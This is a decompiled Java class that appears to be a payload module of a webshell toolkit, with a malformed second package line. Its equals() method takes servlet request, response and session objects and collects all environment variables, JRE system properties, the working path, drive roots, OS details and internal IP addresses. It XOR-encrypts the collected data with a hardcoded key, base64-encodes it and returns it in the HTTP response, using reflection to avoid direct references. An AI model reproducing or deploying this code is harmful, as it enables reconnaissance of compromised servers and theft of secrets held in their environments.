package net.btwyzgi.efv;

package ..deTemp.1735805272370;

import java.io.File;
import java.lang.reflect.Method;
import java.net.InetAddress;
import java.net.NetworkInterface;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.Map;
import java.util.Properties;
import java.util.Random;
import java.util.Set;

public class Yjtbq {
  public static String whatever;
  
  private Object Request;
  
  private Object Response;
  
  private Object Session;
  
  public boolean equals(Object obj) {
    Map<String, String> result = new HashMap<String, String>();
    try {
      fillContext(obj);
      StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>环境变量:</font><br/>");
      Map<String, String> env = System.getenv();
      for (String name : env.keySet())
        basicInfo.append(name + "=" + (String)env.get(name) + "<br/>"); 
      basicInfo.append("<br/><font size=2 color=red>JRE系统属性:</font><br/>");
      Properties props = System.getProperties();
      Set<Map.Entry<Object, Object>> entrySet = props.entrySet();
      for (Map.Entry<Object, Object> entry : entrySet)
        basicInfo.append((new StringBuilder()).append(entry.getKey()).append(" = ").append(entry.getValue()).append("<br/>").toString()); 
      String currentPath = (new File("")).getAbsolutePath();
      String driveList = "";
      File[] roots = File.listRoots();
      for (File f : roots)
        driveList = driveList + f.getPath() + ";"; 
      String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
      Map<String, String> entity = new HashMap<String, String>();
      entity.put("basicInfo", basicInfo.toString());
      entity.put("currentPath", currentPath);
      entity.put("driveList", driveList);
      entity.put("osInfo", osInfo);
      entity.put("arch", System.getProperty("os.arch"));
      entity.put("localIp", getInnerIp());
      result.put("status", "success");
      result.put("msg", buildJson(entity, true));
    } catch (Exception exception) {
      try {
        Object so = this.Response.getClass().getMethod("getOutputStream", new Class[0]).invoke(this.Response, new Object[0]);
        Method write = so.getClass().getMethod("write", new Class[] { byte[].class });
        write.invoke(so, new Object[] { Encrypt(buildJson(result, true).getBytes("UTF-8")) });
        so.getClass().getMethod("flush", new Class[0]).invoke(so, new Object[0]);
        so.getClass().getMethod("close", new Class[0]).invoke(so, new Object[0]);
      } catch (Exception exception1) {}
    } finally {
      try {
        Object so = this.Response.getClass().getMethod("getOutputStream", new Class[0]).invoke(this.Response, new Object[0]);
        Method write = so.getClass().getMethod("write", new Class[] { byte[].class });
        write.invoke(so, new Object[] { Encrypt(buildJson(result, true).getBytes("UTF-8")) });
        so.getClass().getMethod("flush", new Class[0]).invoke(so, new Object[0]);
        so.getClass().getMethod("close", new Class[0]).invoke(so, new Object[0]);
      } catch (Exception exception) {}
    } 
    return true;
  }
  
  private String getInnerIp() {
    String ips = "";
    try {
      Enumeration<NetworkInterface> netInterfaces = NetworkInterface.getNetworkInterfaces();
      InetAddress ip = null;
      while (netInterfaces.hasMoreElements()) {
        NetworkInterface netInterface = netInterfaces.nextElement();
        Enumeration<InetAddress> addresses = netInterface.getInetAddresses();
        while (addresses.hasMoreElements()) {
          ip = addresses.nextElement();
          if (ip != null && ip instanceof java.net.Inet4Address)
            ips = ips + ip.getHostAddress() + " "; 
        } 
      } 
    } catch (Exception exception) {}
    ips = ips.replace("127.0.0.1", "").trim();
    return ips;
  }
  
  private String buildJson(Map<String, String> entity, boolean encode) throws Exception {
    StringBuilder sb = new StringBuilder();
    String version = System.getProperty("java.version");
    sb.append("{");
    for (String key : entity.keySet()) {
      sb.append("\"" + key + "\":\"");
      String value = ((String)entity.get(key)).toString();
      if (encode)
        if (version.compareTo("1.9") >= 0) {
          getClass();
          Class<?> Base64 = Class.forName("java.util.Base64");
          Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
          value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { value.getBytes("UTF-8") });
        } else {
          getClass();
          Class<?> Base64 = Class.forName("sun.misc.BASE64Encoder");
          Object Encoder = Base64.newInstance();
          value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { value.getBytes("UTF-8") });
          value = value.replace("\n", "").replace("\r", "");
        }  
      sb.append(value);
      sb.append("\",");
    } 
    sb.setLength(sb.length() - 1);
    sb.append("}");
    return sb.toString();
  }
  
  private String base64encode(byte[] data) throws Exception {
    String result = "";
    String version = System.getProperty("java.version");
    try {
      getClass();
      Class<?> Base64 = Class.forName("java.util.Base64");
      Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
      result = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { data });
    } catch (Throwable error) {
      getClass();
      Class<?> Base64 = Class.forName("sun.misc.BASE64Encoder");
      Object Encoder = Base64.newInstance();
      result = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { data });
      result = result.replace("\n", "").replace("\r", "");
    } 
    return result;
  }
  
  private void fillContext(Object obj) throws Exception {
    if (obj.getClass().getName().indexOf("PageContext") >= 0) {
      this.Request = obj.getClass().getMethod("getRequest", new Class[0]).invoke(obj, new Object[0]);
      this.Response = obj.getClass().getMethod("getResponse", new Class[0]).invoke(obj, new Object[0]);
      this.Session = obj.getClass().getMethod("getSession", new Class[0]).invoke(obj, new Object[0]);
    } else {
      Map<String, Object> objMap = (Map<String, Object>)obj;
      this.Session = objMap.get("session");
      this.Response = objMap.get("response");
      this.Request = objMap.get("request");
    } 
    this.Response.getClass().getMethod("setCharacterEncoding", new Class[] { String.class }).invoke(this.Response, new Object[] { "UTF-8" });
  }
  
  private byte[] getMagic() throws Exception {
    String key = this.Session.getClass().getMethod("getAttribute", new Class[] { String.class }).invoke(this.Session, new Object[] { "u" }).toString();
    int magicNum = Integer.parseInt(key.substring(0, 2), 16) % 16;
    Random random = new Random();
    byte[] buf = new byte[magicNum];
    for (int i = 0; i < buf.length; i++)
      buf[i] = (byte)random.nextInt(256); 
    return buf;
  }
  
  private byte[] Encrypt(byte[] paramArrayOfbyte) throws Exception {
    byte[] arrayOfByte;
    String str = "e45e329feb5d925b";
    for (byte b = 0; b < paramArrayOfbyte.length; b++)
      paramArrayOfbyte[b] = (byte)(paramArrayOfbyte[b] ^ str.getBytes()[b + 1 & 0xF]); 
    try {
      Class<?> clazz = Class.forName("java.util.Base64");
      Object object = clazz.getMethod("getEncoder", null).invoke(clazz, null);
      arrayOfByte = (byte[])object.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(object, new Object[] { paramArrayOfbyte });
    } catch (Throwable throwable) {
      Class<?> clazz = Class.forName("sun.misc.BASE64Encoder");
      Object object = clazz.newInstance();
      String str1 = (String)object.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(object, new Object[] { paramArrayOfbyte });
      str1 = str1.replace("\n", "").replace("\r", "");
      arrayOfByte = str1.getBytes();
    } 
    return arrayOfByte;
  }
}
